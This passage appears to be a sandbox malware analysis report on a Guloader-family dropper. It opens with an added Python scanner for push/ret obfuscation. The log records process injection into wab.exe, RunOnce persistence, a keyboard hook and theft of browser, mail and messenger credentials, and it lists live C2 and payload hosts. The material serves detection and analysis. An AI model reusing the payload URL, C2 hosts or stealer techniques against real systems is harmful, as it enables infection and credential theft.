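The "push X; ret", "push 6Ah; retf" and "push esp; iretd" findings above come from a byte-pattern heuristic: a push immediately followed by a return transfers control to whatever was pushed, which is a jump written so that a linear disassembler does not see a branch. The scanner below is an added example, not code from the Joe Sandbox report or from the sample; it reimplements that pattern match over a constructed 32-bit x86 buffer (CONSTRUCTED_BLOB is made up for the demonstration, and the base address passed to it is arbitrary).

```python
"""Flag push/ret control-flow obfuscation in a 32-bit x86 code blob.

Added example; it is not code from the Joe Sandbox report or from the sample.
It reimplements the kind of byte-pattern match behind the "push X; ret" findings
and runs it over a constructed buffer (CONSTRUCTED_BLOB).
"""
import struct
from dataclasses import dataclass
from typing import Dict, List, Optional

# 50h..57h are the one-byte "push r32" encodings, in register order.
_REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]


@dataclass(frozen=True)
class Gadget:
    offset: int            # address of the push (base + index into the blob)
    kind: str              # push_reg_ret | push_imm32_ret | push_imm8_retf | push_reg_iretd
    operand: str           # register name, or the immediate as hex text
    target: Optional[int]  # resolved branch target for "push imm32; ret", else None


def scan_push_ret(code: bytes, base: int = 0) -> List[Gadget]:
    """Return every push/ret, push/retf and push/iretd pair in `code`.

    The scan is linear and byte-granular, with no disassembler, so it also finds
    pairs that start inside another instruction; that matches how a sandbox
    heuristic behaves and is why such findings need a second look before they
    are called obfuscation. `base` is the virtual address of code[0].
    """
    found: List[Gadget] = []
    n = len(code)
    for i in range(n):
        op = code[i]
        # push r32 followed by ret (C3h): the pushed register is the next EIP.
        if 0x50 <= op <= 0x57 and i + 1 < n and code[i + 1] == 0xC3:
            found.append(Gadget(base + i, "push_reg_ret", _REG32[op - 0x50], None))
        # push r32 followed by iretd (CFh), as in the "push esp; iretd" finding.
        elif 0x50 <= op <= 0x57 and i + 1 < n and code[i + 1] == 0xCF:
            found.append(Gadget(base + i, "push_reg_iretd", _REG32[op - 0x50], None))
        # push imm32 (68h imm32) followed by ret: a jmp to imm32 in disguise.
        elif op == 0x68 and i + 5 < n and code[i + 5] == 0xC3:
            imm = struct.unpack_from("<I", code, i + 1)[0]
            found.append(Gadget(base + i, "push_imm32_ret", f"0x{imm:08X}", imm))
        # push imm8 (6Ah imm8) followed by retf (CBh), as in "push 6Ah; retf".
        elif op == 0x6A and i + 2 < n and code[i + 2] == 0xCB:
            found.append(Gadget(base + i, "push_imm8_retf", f"0x{code[i + 1]:02X}", None))
    return found


def summarize(code: bytes, base: int = 0) -> Dict[str, int]:
    """Count gadgets by kind; the count relative to code size is the heuristic signal."""
    counts: Dict[str, int] = {}
    for g in scan_push_ret(code, base):
        counts[g.kind] = counts.get(g.kind, 0) + 1
    return counts


# Constructed input (not bytes from the sample): one ordinary prologue, then one
# instance of each pattern the report lists, plus a plain "ret 8" as a control.
CONSTRUCTED_BLOB = bytes.fromhex(
    "55 8B EC"            # push ebp; mov ebp, esp   (normal prologue, no hit)
    "68 10 20 40 00 C3"   # push 0x00402010; ret     (disguised jmp 0x402010)
    "90 90"               # nop; nop
    "51 C3"               # push ecx; ret
    "6A 6A CB"            # push 6Ah; retf
    "54 CF"               # push esp; iretd
    "C2 08 00"            # ret 8                    (no preceding push, no hit)
)

if __name__ == "__main__":
    for g in scan_push_ret(CONSTRUCTED_BLOB, base=0x00416000):
        tail = f" -> 0x{g.target:08X}" if g.target is not None else ""
        print(f"{g.offset:08X}  {g.kind:15s} {g.operand}{tail}")
```

The push imm32 form is the one worth resolving: its immediate is a concrete address you can feed back into the disassembler as a branch target. Register and far-return forms only tell you that control leaves through the stack, so they are best treated as a count against the function's size rather than as individual findings.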
               Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exe | Code function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW
               Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exe | File created: C:\Users\user\AppData\Local\Temp\nsi19C1.tmp\nsExec.dll
               Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exe | File created: C:\Users\user\AppData\Local\Temp\nsi19C1.tmp\BgImage.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | File created: C:\Users\user\AppData\Local\Temp\Skyggelgningen\Etpartisystemers.exe
               Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exe | File created: C:\Users\user\AppData\Local\Temp\nsi19C1.tmp\System.dll
               Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exe | File created: C:\Users\user\AppData\Local\Temp\nsi19C1.tmp\nsDialogs.dll
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Telefonvsenet
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Telefonvsenet
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Telefonvsenet
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Telefonvsenet
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_004047C6 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
               Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exe | Process information set: NOOPENFILEERRORBOX
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process information set: NOOPENFILEERRORBOX
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process information set: NOOPENFILEERRORBOX
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process information set: NOOPENFILEERRORBOX
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process information set: NOOPENFILEERRORBOX
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process information set: NOOPENFILEERRORBOX
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process information set: NOOPENFILEERRORBOX
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process information set: NOOPENFILEERRORBOX
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process information set: NOOPENFILEERRORBOX
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process information set: NOOPENFILEERRORBOX
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process information set: NOOPENFILEERRORBOX
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process information set: NOOPENFILEERRORBOX
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process information set: NOOPENFILEERRORBOX
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process information set: NOOPENFILEERRORBOX
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process information set: NOOPENFILEERRORBOX
               Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1612 | Thread sleep count: 3602 > 30
               Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4048 | Thread sleep count: 81 > 30
               Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4048 | Thread sleep time: -40500s >= -30000s
               Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3048 | Thread sleep count: 5351 > 30
               Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3048 | Thread sleep time: -16053000s >= -30000s
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Thread sleep count: Count: 3602 delay: -5
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 4_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Window / User API: threadDelayed 3602
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Window / User API: threadDelayed 5351
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Window / User API: foregroundWindowGot 1754
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | API coverage: 9.7 %
               Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exe | API call chain: ExitProcess graph end node (graph_0-3904)
               Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exe | API call chain: ExitProcess graph end node (graph_0-3725)
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Roaming\paqlgkfs.dat
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Local\
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Local\Temp\gdbsndrnigbudr
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Local\Temp\ebwamkguuyj
               Source: wab.exe, 00000002.00000002.16922298263.0000000006B5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000002.00000002.16922298263.0000000006B16000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
               Source: wab.exe, 00000002.00000002.16922298263.0000000006B31000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWen-USn
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process information queried: ProcessInformation
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 4_2_00418981 memset,GetSystemInfo
               Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exe | Code function: 0_2_00405841 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
               Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exe | Code function: 0_2_00406393 FindFirstFileW,FindClose
               Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exe | Code function: 0_2_004027FB FindFirstFileW
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 2_2_375610F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 2_2_37566580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 4_2_0040AE51 FindFirstFileW,FindNextFileW
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_00407C87 FindFirstFileA,FindNextFileA,strlen,strlen
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 6_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 4_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle
               Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exe | Code function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 2_2_37564AB4 mov eax, dword ptr fs:[00000030h]
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 2_2_37562639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 2_2_3756724E GetProcessHeap
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process token adjusted: Debug
               Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exe | Code function: 0_2_00404149 LdrInitializeThunk,SendMessageW
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 2_2_37562B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 2_2_37562639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 2_2_375660E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter

              HIPS / PFW / Operating System Protection Evasion

               Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exe | Section loaded: C:\Windows\SysWOW64\mshtml.dll target: C:\Program Files (x86)\Windows Mail\wab.exe protection: read write
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: unknown target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: unknown target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: unknown target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write
               Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exe | Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3000000
               Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exe | Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2FD2008
               Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Users\user\Desktop\SMGS-RCDU5010031.exe
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\uhrhlaw
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ebwamkguuyj
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gdbsndrnigbudr
               Source: wab.exe, 00000002.00000002.16922857668.0000000006B83000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerh
               Source: wab.exe, 00000002.00000002.16922857668.0000000006B83000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000002.00000002.16922298263.0000000006B68000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
               Source: wab.exe, 00000002.00000002.16922298263.0000000006B68000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerD
               Source: wab.exe, 00000002.00000002.16922857668.0000000006B83000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managero
               Source: wab.exe, 00000002.00000002.16922298263.0000000006B68000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerr|
               Source: wab.exe, 00000002.00000002.16922857668.0000000006B83000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000002.00000003.12129563335.0000000006B83000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000002.00000003.12062619602.0000000006B7E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [2023/10/23 20:39:43 Program Manager]
               Source: wab.exe, 00000002.00000002.16922298263.0000000006B68000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager8
               Source: wab.exe, 00000002.00000002.16922857668.0000000006B83000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managert
               Source: wab.exe, 00000002.00000002.16922857668.0000000006B83000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000002.00000002.16922298263.0000000006B5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000002.00000003.12129563335.0000000006B83000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [2023/10/23 20:39:46 Program Manager]
               Source: wab.exe, 00000002.00000002.16922298263.0000000006B68000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000002.00000002.16922298263.0000000006B31000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: |Program Manager|
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Queries volume information: C:\ VolumeInformation
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 2_2_37562933 cpuid
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 2_2_37562264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
               Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 5_2_00408043 memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy
               Source: C:\Users\user\Desktop\SMGS-RCDU5010031.exe | Code function: 0_2_00406072 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW

              Stealing of Sensitive Information

              Source: Yara match | File source: 00000002.00000002.16922298263.0000000006B51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: wab.exe PID: 4672, type: MEMORYSTR
              Source: Yara match | File source: C:\Users\user\AppData\Roaming\paqlgkfs.dat, type: DROPPED
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: ESMTPPassword 5_2_004033E2
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword 5_2_00402DA5
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword 5_2_00402DA5
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqlite
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.db
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: Yara match | File source: Process Memory Space: wab.exe PID: 4672, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: wab.exe PID: 8112, type: MEMORYSTR
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\Software\Paltalk

              Remote Access Functionality

              Source: Yara match | File source: 00000002.00000002.16922298263.0000000006B51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: wab.exe PID: 4672, type: MEMORYSTR
              Source: Yara match | File source: C:\Users\user\AppData\Roaming\paqlgkfs.dat, type: DROPPED
              MITRE ATT&CK Matrix (a number in front of a technique is the count the report attached to that cell; cells without a number are the matrix filler)

              Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
              Valid Accounts | 11 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 1 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 System Shutdown/Reboot
              Default Accounts | 2 Command and Scripting Interpreter | 1 Registry Run Keys / Startup Folder | 1 Access Token Manipulation | 2 Obfuscated Files or Information | 11 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | Exfiltration Over Bluetooth | 1 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
              Domain Accounts | At (Linux) | Logon Script (Windows) | 212 Process Injection | 1 DLL Side-Loading | 2 Credentials in Registry | 3 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | Automated Exfiltration | 1 Non-Standard Port | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
              Local Accounts | At (Windows) | Logon Script (Mac) | 1 Registry Run Keys / Startup Folder | 11 Masquerading | 1 Credentials In Files | 28 System Information Discovery | Distributed Component Object Model | 11 Input Capture | Scheduled Transfer | 2 Non-Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
              Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 2 Virtualization/Sandbox Evasion | LSA Secrets | 131 Security Software Discovery | SSH | 11 Clipboard Data | Data Transfer Size Limits | 212 Application Layer Protocol | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
              Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 Access Token Manipulation | Cached Domain Credentials | 2 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
              External Remote Services | Scheduled Task | Startup Items | Startup Items | 212 Process Injection | DCSync | 4 Process Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
              Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 1 Application Window Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
              Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
              Behavior Graph ID: 1330791
              Sample: SMGS-RCDU5010031.exe, Startdate: 23/10/2023, Architecture: WINDOWS, Score: 100
              Contacted hosts: ourt2949aslumes9.duckdns.org, kapsnovin.com, geoplugin.net
              Signatures: Snort IDS alert for network traffic; Found malware configuration; Antivirus detection for URL or domain; 9 other signatures
              SMGS-RCDU5010031.exe started
                Dropped: C:\Users\user\AppData\Local\...\nsExec.dll (PE32); C:\Users\user\AppData\Local\...\BgImage.dll (PE32); C:\Users\user\AppData\...\trivalente.vid (DOS); 2 other files (none is malicious)
                Signatures: Writes to foreign memory regions; Maps a DLL or memory area into another process
                Started: wab.exe
                  Network: 94.156.6.253 (ports 2402, 50037, 50038; NET1-ASBG Bulgaria); kapsnovin.com 77.238.121.250 (ports 50036, 80; ASIATECHIR Iran (ISLAMIC Republic Of)); geoplugin.net 178.237.33.50 (ports 50039, 80; ATOM86-ASATOM86NL Netherlands)
                  Dropped: C:\Users\user\...tpartisystemers.exe (PE32); C:\Users\user\AppData\Roaming\paqlgkfs.dat (data)
                  Signatures: Maps a DLL or memory area into another process; Installs a global keyboard hook
                  Started: wab.exe, wab.exe, wab.exe
                    Signatures on the child wab.exe processes: Tries to steal Instant Messenger accounts or passwords; Tries to harvest and steal browser information (history, passwords, etc); Tries to steal Mail credentials (via file / registry access)

              Source | Detection | Scanner | Label | Link
              SMGS-RCDU5010031.exe | 42% | ReversingLabs | Win32.Trojan.Guloader |
              Source | Detection | Scanner | Label | Link
              C:\Users\user\AppData\Local\Temp\Skyggelgningen\Etpartisystemers.exe | 42% | ReversingLabs | Win32.Trojan.Guloader |
              C:\Users\user\AppData\Local\Temp\Tilbjelig\diagonallsende\Timebudgetter114\Davening\Udmeldes\trivalente.vid | 0% | ReversingLabs | |
              C:\Users\user\AppData\Local\Temp\nsi19C1.tmp\BgImage.dll | 0% | ReversingLabs | |
              C:\Users\user\AppData\Local\Temp\nsi19C1.tmp\System.dll | 0% | ReversingLabs | |
              C:\Users\user\AppData\Local\Temp\nsi19C1.tmp\nsDialogs.dll | 0% | ReversingLabs | |
              C:\Users\user\AppData\Local\Temp\nsi19C1.tmp\nsExec.dll | 0% | ReversingLabs | |
              No Antivirus matches
              No Antivirus matches
              Source | Detection | Scanner | Label | Link
              https://2542116.fls.doublecli | 0% | Avira URL Cloud | safe |
              https://odc.offi | 0% | Avira URL Cloud | safe |
              http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | 0% | Avira URL Cloud | safe |
              http://www.imvu.comr | 0% | Avira URL Cloud | safe |
              https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3739368433491;gt | 0% | Avira URL Cloud | safe |
              http://geoplugin.net/json.gpEd | 0% | Avira URL Cloud | safe |
              http://kapsnovin.com/KvGfOfeyMpEaqpzI164.bin | 100% | Avira URL Cloud | malware |
              https://go.microsoft.co | 0% | Avira URL Cloud | safe |
              http://kapsnovin.com/KvGfOfeyMpEaqpzI164.bin_ | 0% | Avira URL Cloud | safe |
              https://adservice.google.co. | 0% | Avira URL Cloud | safe |
              http://kapsnovin.com/KvGfOfeyMpEaqpzI164.binMillIntunif-pid.com/KvGfOfeyMpEaqpzI164.bin | 0% | Avira URL Cloud | safe |
              https://contextual.med | 0% | Avira URL Cloud | safe |
              http://www.imvu.comata | 0% | Avira URL Cloud | safe |
              https://odc.officeap | 0% | Avira URL Cloud | safe |
              https://2542116.fls.double | 0% | Avira URL Cloud | safe |
              https://2542116.fls.doub | 0% | Avira URL Cloud | safe |
              http://kapsnovin.com/KvGfOfeyMpEaqpzI164.binJ | 0% | Avira URL Cloud | safe |
              http://geoplugin.net/json.gpmd | 0% | Avira URL Cloud | safe |
              http://geoplugin.net/json.gpn.net/son.gpp.dll | 0% | Avira URL Cloud | safe |
              http | 0% | Avira URL Cloud | safe |
              https://eb2.3lif | 0% | Avira URL Cloud | safe |
              http://geoplugin.net/json.gpl | 0% | Avira URL Cloud | safe |
              http://geoplugin.net/json.gphx | 0% | Avira URL Cloud | safe |
              https://2542116.fls.doubXXO | 0% | Avira URL Cloud | safe |
              https://get.a | 0% | Avira URL Cloud | safe |
              http://geoplugin.net/json.gp | 0% | Avira URL Cloud | safe |
              https://get3.adobe | 0% | Avira URL Cloud | safe |
              https://capturemedia-assets.com/ig-bank/ad-engagement/startAnimation/main/index.html | 0% | Avira URL Cloud | safe |
              http://geoplugin.net/ | 0% | Avira URL Cloud | safe |
              http://kapsnovin.com/KvGfOfeyMpEaqpzI164.biny | 0% | Avira URL Cloud | safe |
              https://contextual.medi | 0% | Avira URL Cloud | safe |
              https://get3.adobe.co | 0% | Avira URL Cloud | safe |
              https://tpc.g | 0% | Avira URL Cloud | safe |
              http://www.ebuddy.com | 0% | Avira URL Cloud | safe |
              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              geoplugin.net | 178.237.33.50 | true | false | | unknown
              kapsnovin.com | 77.238.121.250 | true | true | | unknown
              ourt2949aslumes9.duckdns.org | unknown | unknown | true | | unknown
              Name | Malicious | Antivirus Detection | Reputation
              http://kapsnovin.com/KvGfOfeyMpEaqpzI164.bin | true | Avira URL Cloud: malware | unknown
              http | true | Avira URL Cloud: safe | low
              http://geoplugin.net/json.gp | false | Avira URL Cloud: safe | unknown
              Name | Source | Malicious | Antivirus Detection | Reputation
